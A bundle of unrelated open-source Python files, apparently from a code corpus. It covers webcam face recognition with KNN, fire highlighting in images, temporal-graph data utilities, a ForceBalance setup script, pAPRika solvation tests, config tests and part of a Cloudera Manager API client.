face_labels = np.concatenate(labels, axis=0).reshape((-1, 1))
print(face_labels.shape)
print(face_dataset.shape)
trainset = np.concatenate((face_dataset, face_labels), axis=1)
print(trainset.shape)
font = cv2.FONT_HERSHEY_SIMPLEX
while True:
ret, frame = cap.read()
if ret == False:
continue
# Convert frame to grayscale
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Detect multi faces in the image
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for face in faces:
x, y, w, h = face
# Get the face ROI
offset = 5
faces_section = frame[y-offset:y+h+offset, x-offset:x+w+offset]
faces_section = cv2.resize(faces_section, (100, 100))
# Use KNN to classify which face is shown on the webcam
out = knn(trainset, faces_section.flatten())
# Put the name of the face in the original image
cv2.putText(frame, names[int(out)], (x-35, y-5), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 2, cv2.LINE_AA)
# Draw rectangle in the original image
cv2.rectangle(frame, (x,y), (x+w, y+h), (0, 255, 0), 2)
cv2.imshow('Faces', frame)
if cv2.waitKey(1) == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
```
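The `knn` helper above expects a training matrix whose last column holds the label. A quick sanity check on a tiny, made-up 2-D dataset (assumes `knn` from the file above is in scope; the numbers are arbitrary):
```python
import numpy as np

# two clusters of 2-D points; the last column is the class label (0 or 1)
train = np.array([
    [1.0, 1.0, 0],
    [1.2, 0.8, 0],
    [0.9, 1.1, 0],
    [5.0, 5.0, 1],
    [5.2, 4.8, 1],
    [4.9, 5.1, 1],
])

test_point = np.array([4.8, 5.3])
print(knn(train, test_point, k=3))  # expected 1.0: the nearest neighbours are all class 1
```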
#### File: Image_Processing/Image_Processing_Applications/Fire_Detection.py
```python
from simpleimage import SimpleImage
HURDLE_FACTOR = 1.05
def highlight_fires(filename):
"""
:param filename str, the filename of the image
:return: SimpleImage, the processed image
"""
img = SimpleImage(filename)
for pixel in img:
avg = (pixel.green+pixel.blue+pixel.red)//3 # calculate the average pixel value of red, green and blue
if pixel.red > avg * HURDLE_FACTOR:
pixel.red = 255
pixel.blue = 0
pixel.green = 0
else:
pixel.red = avg
pixel.blue = avg
pixel.green = avg
return img
def main():
"""
First show the original greenland-fire.png image, then pass it to the highlight_fires
function and show the resulting fire-highlighted image.
"""
original_fire = SimpleImage('images/greenland-fire.png')
original_fire.show()
highlighted_fire = highlight_fires('images/greenland-fire.png')
highlighted_fire.show()
if __name__ == '__main__':
main()
```
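The highlight rule marks a pixel as fire when its red channel beats the channel average by the 5% hurdle, and grayscales it otherwise. A stand-alone sketch of that per-pixel decision on plain RGB values (no SimpleImage dependency):
```python
HURDLE_FACTOR = 1.05

def classify_pixel(r, g, b):
    """Return the highlighted (r, g, b) for one pixel."""
    avg = (r + g + b) // 3
    if r > avg * HURDLE_FACTOR:
        return (255, 0, 0)      # clearly red -> mark as fire
    return (avg, avg, avg)      # otherwise -> grayscale

print(classify_pixel(200, 60, 40))   # (255, 0, 0): 200 > 1.05 * 100
print(classify_pixel(90, 100, 110))  # (100, 100, 100): not red enough
```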
|
{
"source": "Jeff20100601/GHNN_clean",
"score": 2
}
|
#### File: Jeff20100601/GHNN_clean/utils_ct.py
```python
import os
from settings import settings
import numpy as np
import torch
import argparse
def get_total_number(inPath, fileName):
with open(os.path.join(inPath, fileName), 'r') as fr:
for line in fr:
line_split = line.split()
return int(line_split[0]), int(line_split[1]), int(line_split[2])
def load_quadruples(inPath, fileName):
with open(os.path.join(inPath, fileName), 'r') as fr:
quadrupleList = []
times = set()
for line in fr:
line_split = line.split()
head = int(line_split[0])
tail = int(line_split[2])
rel = int(line_split[1])
time = int(int(line_split[3])/settings['time_scale'])
quadrupleList.append([head, rel, tail, time])
times.add(time)
times = list(times)
times.sort()
return np.asarray(quadrupleList), np.asarray(times)
def make_batch(a, b, c, d, e, f, g, h, j, k, l, m, n, valid1 = None, valid2 = None):
if valid1 is None and valid2 is None:
# For item i in a range that is a length of l
for i in range(0, len(a), n):
yield [a[i:i + n], b[i:i + n], c[i:i + n], d[i:i + n], e[i:i + n],
f[i:i + n], g[i:i + n], h[i:i + n], j[i:i + n], k[i:i + n], l[i:i + n], m[i:i + n]]
else:
# For item i in a range that is a length of l
for i in range(0, len(a), n):
yield [a[i:i + n], b[i:i + n], c[i:i + n], d[i:i + n], e[i:i + n],
f[i:i + n], g[i:i + n], h[i:i + n], j[i:i + n], k[i:i + n], l[i:i + n], m[i:i + n],
valid1[i:i + n], valid2[i:i + n]]
def to_device(tensor):
if torch.cuda.is_available():
return tensor.cuda()
else:
return tensor
def isListEmpty(inList):
if isinstance(inList, list):
return all( map(isListEmpty, inList) )
return False
def get_sorted_s_r_embed(s_hist, s, r, ent_embeds, s_hist_dt):
s_hist_len = to_device(torch.LongTensor(list(map(len, s_hist))))
s_len, s_idx = s_hist_len.sort(0, descending=True)
num_non_zero = len(torch.nonzero(s_len))
s_len_non_zero = s_len[:num_non_zero]
s_hist_sorted = []
s_hist_dt_sorted = []
for idx in s_idx[:num_non_zero]:
s_hist_sorted.append(s_hist[idx.item()])
s_hist_dt_sorted.append(s_hist_dt[idx.item()])
flat_s = []
len_s = []
for hist in s_hist_sorted:
for neighs in hist:
len_s.append(len(neighs))
for neigh in neighs:
flat_s.append(neigh)
s_tem = s[s_idx]
r_tem = r[s_idx]
embeds = ent_embeds[to_device(torch.LongTensor(flat_s))]
embeds_split = torch.split(embeds, len_s)
return s_idx, s_len_non_zero, s_tem, r_tem, embeds, len_s, embeds_split, s_hist_dt_sorted
def str2bool(v: str) -> bool:
v = v.lower()
if v == "true":
return True
elif v == "false":
return False
else:
raise argparse.ArgumentTypeError("Boolean value expected, got" + str(v) + ".")
```
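`make_batch` slices twelve parallel lists (plus two optional validity lists) into chunks of `n` rows. A minimal illustration with dummy integer columns (assumes `make_batch` from the module above is in scope):
```python
# twelve tiny parallel "columns" of length 5, batched two rows at a time
cols = [list(range(5)) for _ in range(12)]
for batch in make_batch(*cols, 2):
    print(len(batch), batch[0])
# prints: 12 [0, 1] / 12 [2, 3] / 12 [4]
```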
|
{
"source": "jeff231li/forcebalance",
"score": 2
}
|
#### File: jeff231li/forcebalance/setup.py
```python
from __future__ import print_function
__author__ = "<NAME>"
from setuptools import setup,Extension
import os,sys,re
import shutil
import glob
import argparse
import subprocess
#===================================#
#| ForceBalance version number |#
#| Make sure to update the version |#
#| manually in : |#
#| |#
#| doc/header.tex |#
#| doc/api_header.tex |#
#| bin/ForceBalance.py |#
#===================================#
__version__ = "v1.9.1"
try:
# use git to find current version
git_describe = subprocess.check_output(["git", "describe"]).strip()
__version__ = re.sub('-g[0-9a-f]*$','',git_describe)
except: pass
# The versioning file logic does not work.
# Commenting out until further notice.
# versioning_file = os.path.join(os.path.dirname(__file__), '.__version__')
# try:
# git_describe = subprocess.check_output(["git", "describe"]).strip()
# __version__ = re.sub('-g[0-9a-f]*$','',git_describe)
# with open(versioning_file, 'w') as fh:
# fh.write(__version__)
# #subprocess.call(["git", "add", ".__version__"])
# except:
# with open(versioning_file, 'r') as fh:
# __version__ = fh.read().strip()
# DCD file reading module
DCD = Extension('forcebalance/_dcdlib',
sources = [ "ext/molfile_plugin/dcdplugin_s.c" ],
libraries=['m'],
include_dirs = ["ext/molfile_plugin/include/","ext/molfile_plugin"]
)
# Hungarian algorithm for permutations
# Used for identifying normal modes
# PERMUTE = Extension('forcebalance/_assign',
# sources = ['ext/permute/apc.c', 'ext/permute/assign.c'],
# include_dirs = [numpy.get_include(), os.path.join(numpy.get_include(), 'numpy')]
# )
# 'contact' library from MSMBuilder for rapidly computing interatomic distances.
# If we're on Mac OS, it can't find the OpenMP libraries
# import platform
# if platform.system() == 'Darwin':
# CONTACT = Extension('forcebalance/_contact_wrap',
# sources = ["ext/contact/contact.c",
# "ext/contact/contact_wrap.c"],
# extra_compile_args=["-std=c99","-O3","-shared",
# "-Wall"],
# include_dirs = [numpy.get_include(), os.path.join(numpy.get_include(), 'numpy')])
# else:
# CONTACT = Extension('forcebalance/_contact_wrap',
# sources = ["ext/contact/contact.c",
# "ext/contact/contact_wrap.c"],
# extra_compile_args=["-std=c99","-O3","-shared",
# "-fopenmp", "-Wall"],
# extra_link_args=['-lgomp'],
# include_dirs = [numpy.get_include(), os.path.join(numpy.get_include(), 'numpy')])
def buildKeywordDictionary(args):
setupKeywords = {}
setupKeywords["name"] = "forcebalance"
# Don't create a separate installed version number for every commit
setupKeywords["version"] = re.sub('-[0-9]*$','',__version__)
setupKeywords["author"] = "<NAME>"
setupKeywords["author_email"] = "<EMAIL>"
setupKeywords["license"] = "BSD 2.0"
setupKeywords["url"] = "https://simtk.org/home/forcebalance"
setupKeywords["download_url"] = "https://simtk.org/home/forcebalance"
setupKeywords["scripts"] = glob.glob("bin/*.py") + glob.glob("bin/*.sh") + glob.glob("bin/*.bash") + glob.glob("bin/ForceBalance") + glob.glob("bin/TidyOutput")
setupKeywords["packages"] = ["forcebalance"]
setupKeywords["package_dir"] = {"forcebalance" : "src",
}
setupKeywords["package_data"] = {
"forcebalance" : ["AUTHORS","LICENSE.txt","data/*.py","data/*.sh","data/*.bash","data/uffparms.in","data/oplsaa.ff/*"]
}
setupKeywords["data_files"] = []
setupKeywords["ext_modules"] = [DCD]
setupKeywords["platforms"] = ["Linux"]
setupKeywords["description"] = "Automated force field optimization."
# setupKeywords["install_requires"] = ['networkx>=1.9,<2.0', 'decorator>=3.4.0']
setupKeywords["long_description"] = """
ForceBalance (https://simtk.org/home/forcebalance) is a library
that provides tools for automated optimization of force fields and
empirical potentials.
The philosophy of this program is to present force field
optimization in a unified and easily extensible framework. Since
there are many different ways in theoretical chemistry to compute
the potential energy of a collection of atoms, and similarly many
types of reference data to fit these potentials to, we do our best
to provide an infrastructure which allows a user or a contributor
to fit any type of potential to any type of reference data.
"""
if not args.dirty: doClean()
# setupKeywords["packages"].append("forcebalance.unit")
if args.test:
setupKeywords["packages"].append("forcebalance.test")
setupKeywords["package_dir"].update({"forcebalance.test" : "test"})
os.chdir("test") # change directories to glob test files
test_data = glob.glob("files/*.*") + glob.glob("files/forcefield/*.*") + glob.glob("files/targets/*/*.*") + glob.glob("files/*.*") + ["files/work_queue_worker"]
os.chdir("..")
setupKeywords["package_data"].update({'forcebalance.test': test_data})
if args.gui:
setupKeywords["packages"].append("forcebalance.gui")
return setupKeywords
def doClean():
"""Remove existing forcebalance module folder before installing"""
try:
forcebalance_dir=os.path.dirname(__import__('forcebalance').__file__)
except ImportError:
print("Couldn't find existing forcebalance installation. Nothing to clean...\n")
return
except:
print("Couldn't read forcebalance location... Continuing with regular install")
return
#raw_input("All files in %s will be deleted for clean\nPress <Enter> to continue, <Ctrl+C> to abort\n" % forcebalance_dir)
print("Removing the directory tree prior to install: %s" % forcebalance_dir)
subprocess.call("rm -f %s/../forcebalance-*.egg-info" % forcebalance_dir, shell=True)
if os.path.exists(forcebalance_dir):
shutil.rmtree(forcebalance_dir, ignore_errors=True)
def main():
# if len(os.path.split(__file__)[0]) > 0:
# os.chdir(os.path.split(__file__)[0])
## Install options
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--dirty', action='store_true', help="don't remove previously installed forcebalance installation first")
parser.add_argument('-t', '--test', action='store_true', help='install forcebalance test suite')
parser.add_argument('-g', '--gui', action='store_true', help='install forcebalance gui module')
args, sys.argv= parser.parse_known_args(sys.argv)
setupKeywords=buildKeywordDictionary(args)
## Run setuptools command.
## Refer to setup.cfg for customizing installation behavior
setup(**setupKeywords)
if os.path.exists('build'):
shutil.rmtree('build')
try:
import bz2
except ImportError:
print("Error importing bz2, which is important for distributed calculations and remote targets")
print("Please either (1) make sure Python is built/installed with bz2 support")
print("or (2) proceed with inefficient reading/writing of files; remote targets won't work.")
if __name__ == '__main__':
main()
```
|
{
"source": "jeff231li/pAPRika",
"score": 2
}
|
#### File: paprika/tests/test_tleap.py
```python
import random as random
import shutil
import pytest
from paprika.align import *
from paprika.dummy import *
from paprika.tleap import *
@pytest.fixture
def clean_files(directory=os.path.join(os.path.dirname(__file__), "tmp")):
# This happens before the test function call
if os.path.isdir(directory):
shutil.rmtree(directory)
os.makedirs(directory)
yield
# This happens after the test function call
shutil.rmtree(directory)
@pytest.mark.slow
def test_solvation_simple(clean_files):
""" Test that we can solvate CB6-BUT using default settings. """
waters = np.random.randint(100, 10000)
log.debug("Trying {} waters with default settings...".format(waters))
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.target_waters = waters
sys.output_prefix = "solvate"
sys.build()
grepped_waters = sp.check_output(
["grep -oh 'WAT' ./tmp/solvate.prmtop | wc -w"], shell=True
)
assert int(grepped_waters) == waters
@pytest.mark.parametrize("shape", ["octahedral", "cubic"])
def test_solvation_shapes(shape, clean_files):
""" Test that we can solvate CB6-BUT with a truncated octahedron. """
waters = np.random.randint(1000, 10000)
log.debug("Trying {} waters in a truncated octahedron...".format(waters))
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.loadpdb_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but.pdb"
)
sys.target_waters = waters
sys.output_prefix = "solvate"
sys.pbc_type = shape
sys.build()
grepped_waters = sp.check_output(
["grep -oh 'WAT' ./tmp/solvate.prmtop | wc -w"], shell=True
)
assert int(grepped_waters) == waters
@pytest.mark.slow
def test_solvation_spatial_size(clean_files):
""" Test that we can solvate CB6-BUT with an buffer size in Angstroms. """
random_int = np.random.randint(10, 20)
random_size = random_int * np.random.random_sample(1) + random_int
log.debug("Trying buffer size of {} A...".format(random_size[0]))
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.loadpdb_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but.pdb"
)
sys.buffer_value = float(random_size[0])
sys.output_prefix = "solvate"
sys.pbc_type = "cubic"
sys.build()
grepped_waters = sp.check_output(
["grep -oh 'WAT' ./tmp/solvate.prmtop | wc -w"], shell=True
)
assert int(grepped_waters) == sys.target_waters
@pytest.mark.slow
def test_solvation_potassium_control(clean_files):
""" Test there is no potassium by default. A negative control. """
waters = np.random.randint(1000, 10000)
log.debug("Trying {} waters with potassium...".format(waters))
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.loadpdb_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but.pdb"
)
sys.target_waters = waters
sys.output_prefix = "solvate"
sys.counter_cation = "K+"
sys.build()
potassium = sp.check_output(
["grep -oh 'K+' ./tmp/solvate.prmtop | wc -w"], shell=True
)
assert int(potassium) == 0
@pytest.mark.slow
def test_solvation_with_additional_ions(clean_files):
""" Test that we can solvate CB6-BUT with additional ions. """
waters = np.random.randint(1000, 10000)
cations = ["LI", "Na+", "K+", "RB", "CS"]
anions = ["F", "Cl-", "BR", "IOD"]
n_cations = np.random.randint(1, 10)
n_anions = np.random.randint(1, 10)
random_cation = random.choice(cations)
random_anion = random.choice(anions)
log.debug("Trying {} waters with additional ions...".format(waters))
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.loadpdb_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but.pdb"
)
sys.target_waters = waters
sys.output_prefix = "solvate"
sys.neutralize = False
sys.add_ions = [random_cation, n_cations, random_anion, n_anions]
sys.build()
# These should come in the RESIDUE_LABEL region of the prmtop and be before all the water.
cation_number = sp.check_output(
[
"grep -A 99 RESIDUE_LABEL ./tmp/solvate.prmtop | "
+ "grep -oh '{} ' | wc -w".format(random_cation)
],
shell=True,
)
anion_number = sp.check_output(
[
"grep -A 99 RESIDUE_LABEL ./tmp/solvate.prmtop | "
+ "grep -oh '{} ' | wc -w".format(random_anion)
],
shell=True,
)
log.debug("Expecting...")
log.debug("cation = {}\tn_cations={}".format(random_cation, n_cations))
log.debug("anion = {}\t n_anions={}".format(random_anion, n_anions))
log.debug("Found...")
log.debug(" n_cations={}".format(cation_number))
log.debug(" n_anions={}".format(anion_number))
assert int(cation_number) == n_cations and int(anion_number) == n_anions
def test_solvation_by_M_and_m(clean_files):
""" Test that we can solvate CB6-BUT through molarity and molality. """
log.debug("Trying 10 A buffer with 150 mM NaCl...")
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.loadpdb_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but.pdb"
)
sys.buffer_value = 10.0
sys.output_prefix = "solvate"
sys.neutralize = False
sys.pbc_type = "rectangular"
sys.add_ions = ["NA", "0.150M", "CL", "0.150M", "K", "0.100m", "BR", "0.100m"]
sys.build()
# Molarity Check
obs_num_na = sp.check_output(
["grep -A 99 RESIDUE_LABEL ./tmp/solvate.prmtop | " + "grep -oh 'NA ' | wc -w"],
shell=True,
)
obs_num_cl = sp.check_output(
["grep -A 99 RESIDUE_LABEL ./tmp/solvate.prmtop | " + "grep -oh 'CL ' | wc -w"],
shell=True,
)
volume = sys.get_volume()
volume_in_liters = volume * ANGSTROM_CUBED_TO_LITERS
calc_num_na = np.ceil((6.022 * 10 ** 23) * (0.150) * volume_in_liters)
calc_num_cl = np.ceil((6.022 * 10 ** 23) * (0.150) * volume_in_liters)
assert int(obs_num_na) == int(calc_num_na)
assert int(obs_num_cl) == int(calc_num_cl)
# Molality Check
obs_num_k = sp.check_output(
["grep -A 99 RESIDUE_LABEL ./tmp/solvate.prmtop | " + "grep -oh 'K ' | wc -w"],
shell=True,
)
obs_num_br = sp.check_output(
["grep -A 99 RESIDUE_LABEL ./tmp/solvate.prmtop | " + "grep -oh 'BR ' | wc -w"],
shell=True,
)
calc_num_waters = sys.count_residues()["WAT"]
calc_num_k = np.ceil(0.100 * calc_num_waters * 0.018)
calc_num_br = np.ceil(0.100 * calc_num_waters * 0.018)
assert int(obs_num_k) == int(calc_num_k)
assert int(obs_num_br) == int(calc_num_br)
@pytest.mark.slow
def test_alignment_workflow(clean_files):
""" Test that we can solvate CB6-BUT after alignment. """
cb6 = pmd.load_file(
os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but-notcentered.pdb"
)
)
zalign(cb6, ":CB6", ":BUT", save=True, filename="./tmp/tmp.pdb")
waters = np.random.randint(1000, 10000)
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.loadpdb_file = "tmp.pdb"
sys.target_waters = waters
sys.output_prefix = "solvate"
sys.build()
log.debug("Trying {} waters after alignment...".format(waters))
grepped_waters = sp.check_output(
["grep -oh 'WAT' ./tmp/solvate.prmtop | wc -w"], shell=True
)
assert int(grepped_waters) == waters
def test_add_dummy(clean_files):
""" Test that dummy atoms get added correctly """
temporary_directory = os.path.join(os.path.dirname(__file__), "tmp")
host_guest = pmd.load_file(
os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but-notcentered.pdb"
),
structure=True,
)
host_guest = zalign(host_guest, ":BUT@C", ":BUT@C3", save=False)
host_guest = add_dummy(host_guest, residue_name="DM1", z=-11.000, y=2.000, x=-1.500)
host_guest.write_pdb(
os.path.join(temporary_directory, "cb6-but-dum.pdb"), renumber=False
)
with open(os.path.join(temporary_directory, "cb6-but-dum.pdb"), "r") as f:
lines = f.readlines()
test_line1 = lines[123].rstrip()
test_line2 = lines[124].rstrip()
ref_line1 = "TER 123 BUT 2"
ref_line2 = (
"HETATM 123 DUM DM1 3 -1.500 2.000 -11.000 0.00 0.00 PB"
)
assert ref_line1 == test_line1
assert ref_line2 == test_line2
write_dummy_frcmod(path=temporary_directory)
write_dummy_mol2(path=temporary_directory, filename="dm1.mol2", residue_name="DM1")
sys = System()
cb6_frcmod = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/cb6.frcmod")
)
cb6_mol2 = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/cb6.mol2")
)
but_frcmod = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/but.frcmod")
)
but_mol2 = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/but.mol2")
)
sys.template_lines = [
"source leaprc.gaff",
f"loadamberparams {cb6_frcmod}",
f"CB6 = loadmol2 {cb6_mol2}",
f"loadamberparams {but_frcmod}",
f"BUT = loadmol2 {but_mol2}",
"loadamberparams dummy.frcmod",
"DM1 = loadmol2 dm1.mol2",
"model = loadpdb cb6-but-dum.pdb",
]
sys.output_path = temporary_directory
sys.output_prefix = "cb6-but-dum"
sys.pbc_type = None
sys.neutralize = False
sys.build()
with open(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/REF_cb6-but-dum.rst7"),
"r",
) as f:
contents = f.read()
reference = [float(i) for i in contents.split()[2:]]
with open(os.path.join(temporary_directory, "cb6-but-dum.rst7"), "r") as f:
contents = f.read()
new = [float(i) for i in contents.split()[2:]]
assert np.allclose(reference, new)
def test_hydrogen_mass_repartitioning(clean_files):
""" Test that hydrogen mass is repartitioned. """
temporary_directory = os.path.join(os.path.dirname(__file__), "tmp")
sys = System()
but_frcmod = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/but.frcmod")
)
but_mol2 = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/but.mol2")
)
sys.template_lines = [
"source leaprc.gaff",
f"loadamberparams {but_frcmod}",
f"BUT = loadmol2 {but_mol2}",
f"model = loadmol2 {but_mol2}",
]
sys.output_path = temporary_directory
sys.output_prefix = "but"
sys.pbc_type = None
sys.neutralize = False
sys.build()
but = pmd.load_file(os.path.join(temporary_directory, sys.output_prefix + ".prmtop"))
assert np.allclose(but["@H="].atoms[0].mass, 1.008)
sys.repartition_hydrogen_mass()
but = pmd.load_file(os.path.join(temporary_directory, sys.output_prefix + ".prmtop"))
assert np.allclose(but["@H="].atoms[0].mass, 3.024)
```
|
{
"source": "jeff2d2/wtf-bot",
"score": 2
}
|
#### File: jeff2d2/wtf-bot/test_config.py
```python
import os
import pytest
from config import Config
@pytest.fixture(autouse=True)
def preserve_env_vars():
orig_data_url = os.getenv('DATA_URL')
orig_slack_tokens = os.getenv('SLACK_TOKENS')
yield
os.environ['DATA_URL'] = orig_data_url
os.environ['SLACK_TOKENS'] = orig_slack_tokens
@pytest.mark.parametrize("setting", ['DATA_URL', 'SLACK_TOKENS'])
def test_raises_exception_on_missing_setting(setting):
del os.environ[setting]
with pytest.raises(ValueError) as e:
assert Config().__getattribute__(setting)
assert str(e.value) == f'No {setting} environment variable set'
def test_handles_multiple_tokens_comma_separated():
os.environ['SLACK_TOKENS'] = 'token1,token2,token3'
assert Config().SLACK_TOKENS == ['token1', 'token2', 'token3']
```
|
{
"source": "jeff303/mse",
"score": 3
}
|
#### File: python/testing/TestUtils.py
```python
from pyspark.sql import *
from pyspark.sql.types import *
from pyspark.sql.functions import *
import unittest
def check_answer(result: DataFrame, expected_value: list, expected_schema: StructType):
tc = unittest.TestCase('__init__')
tc.assertEqual(result.collect(), expected_value)
tc.assertEqual(result.schema, expected_schema)
def updated(self: StructType, idx: int, element: StructField):
fields_list = self.fields.copy()
fields_list[idx] = element
return StructType(fields_list)
StructType.updated = updated
```
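The module monkey-patches `StructType` with an `updated` helper that swaps one field while leaving the original schema untouched. A short usage sketch (assumes PySpark is installed and this module has been imported so the patch is applied):
```python
from pyspark.sql.types import StructType, StructField, StringType, IntegerType

schema = StructType([
    StructField("name", StringType(), True),
    StructField("age", StringType(), True),   # wrong type on purpose
])

# replace field 1 with a corrected definition; `schema` itself is unchanged
fixed = schema.updated(1, StructField("age", IntegerType(), False))
print(fixed["age"].dataType)    # IntegerType()
print(schema["age"].dataType)   # still StringType()
```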
|
{
"source": "jeff303/topology_cdh",
"score": 2
}
|
#### File: jeff303/topology_cdh/cm_api.py
```python
import json
import logging
import requests
from clusterdock.utils import join_url_parts
DEFAULT_CM_USERNAME = 'admin' #:
DEFAULT_CM_PASSWORD = '<PASSWORD>' #:
REQUIRED_HEADERS = {'Content-Type': 'application/json'}
logger = logging.getLogger('clusterdock.{}'.format(__name__))
class ApiClient:
"""API client to communicate with a Cloudera Manager instance.
Args:
server_url (:obj:`str`): Cloudera Manager server URL (including port).
username (:obj:`str`, optional): Cloudera Manager username. Default:
:py:const:`DEFAULT_CM_USERNAME`
password (:obj:`str`, optional): Cloudera Manager password. Default:
:py:const:`DEFAULT_CM_PASSWORD`
"""
def __init__(self,
server_url,
username=DEFAULT_CM_USERNAME,
password=<PASSWORD>_CM_PASSWORD):
self.server_url = server_url
self.session = requests.Session()
self.session.auth = (username, password)
self.session.headers.update(REQUIRED_HEADERS)
self.api_version = self._get_api_version()
def get_all_hosts(self, view='summary'):
"""Get information about all the hosts in the deployment.
Args:
view (:obj:`str`, optional): The collection view. Could be ``summary`` or ``full``.
Default: ``summary``
Returns:
A dictionary (host ref list) of the hosts in the deployment.
"""
return self._get(endpoint='{}/hosts'.format(self.api_version),
params=dict(view=view)).json()
def get_cluster_parcels(self, cluster_name, view='summary'):
"""Get a list of all parcels to which a cluster has access.
Args:
cluster_name (:obj:`str`): The name of the cluster.
view (:obj:`str`, optional): The collection view. Could be ``summary`` or ``full``.
Default: ``summary``
Returns:
A dictionary (parcel list) of the parcels to which a cluster has access.
"""
return self._get(endpoint='{}/clusters/{}/parcels'.format(self.api_version,
cluster_name),
params={'view': view}).json()
def get_cluster_parcel_usage(self, cluster_name):
"""Get detailed parcel usage for a cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (parcel usage) of the parcels in use on the cluster.
"""
return self._get(endpoint='{}/clusters/{}/parcels/usage'.format(self.api_version,
cluster_name)).json()
def refresh_parcel_repos(self):
"""Refresh parcel information.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/cm/commands/'
'refreshParcelRepos').format(self.api_version)).json()
def activate_cluster_parcel(self, cluster_name, product, version):
"""Activate a parcel on the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
product (:obj:`str`): The product to activate.
version (:obj:`str`): The version to activate.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/parcels/products/{}/'
'versions/{}/commands/activate').format(self.api_version,
cluster_name,
product,
version)).json()
def deactivate_cluster_parcel(self, cluster_name, product, version):
"""Deactivate a parcel on the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
product (:obj:`str`): The product to deactivate.
version (:obj:`str`): The version to deactivate.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/parcels/products/{}/'
'versions/{}/commands/deactivate').format(self.api_version,
cluster_name,
product,
version)).json()
def distribute_cluster_parcel(self, cluster_name, product, version):
"""Distribute parcel on the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
product (:obj:`str`): The product to distribute.
version (:obj:`str`): The version to distribute.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/parcels/products/{}/'
'versions/{}/commands/'
'startDistribution').format(self.api_version,
cluster_name,
product,
version)).json()
def download_cluster_parcel(self, cluster_name, product, version):
"""Download parcel on the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
product (:obj:`str`): The product to download.
version (:obj:`str`): The version to download.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/parcels/products/{}/'
'versions/{}/commands/startDownload').format(self.api_version,
cluster_name,
product,
version)).json()
def remove_distributed_cluster_parcel(self, cluster_name, product, version):
"""Remove distributed parcel on the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
product (:obj:`str`): The product whose distribution to remove.
version (:obj:`str`): The version whose distribution to remove.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/parcels/products/{}/'
'versions/{}/commands/'
'startRemovalOfDistribution').format(self.api_version,
cluster_name,
product,
version)).json()
def remove_downloaded_cluster_parcel(self, cluster_name, product, version):
"""Remove downloaded parcel on the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
product (:obj:`str`): The product whose download to remove.
version (:obj:`str`): The version whose download to remove.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/parcels/products/{}/'
'versions/{}/commands/removeDownload').format(self.api_version,
cluster_name,
product,
version)).json()
def get_host(self, host_id):
"""Get information about a specific host in the deployment.
Args:
host_id (:obj:`str`): The host ID of the host.
Returns:
A dictionary of information about the host.
"""
return self._get(endpoint='{}/hosts/{}'.format(self.api_version,
host_id)).json()
def get_cluster_hosts(self, cluster_name):
"""Get information about the hosts associated with the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (host ref list) of the hosts associated with the cluster.
"""
return self._get(endpoint='{}/clusters/{}/hosts'.format(self.api_version,
cluster_name)).json()
def add_cluster_hosts(self, cluster_name, host_ref_list):
"""Add hosts to the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
host_ref_list (:obj:`dict`)
Returns:
A dictionary (host ref list) of the hosts added to the cluster.
"""
return self._post(endpoint='{}/clusters/{}/hosts'.format(self.api_version,
cluster_name),
data=host_ref_list).json()
def create_cluster_services(self, cluster_name, service_list):
"""Create a list of services.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_list (:obj:`dict`)
Returns:
A dictionary (service list) of the created services.
"""
return self._post(endpoint='{}/clusters/{}/services'.format(self.api_version,
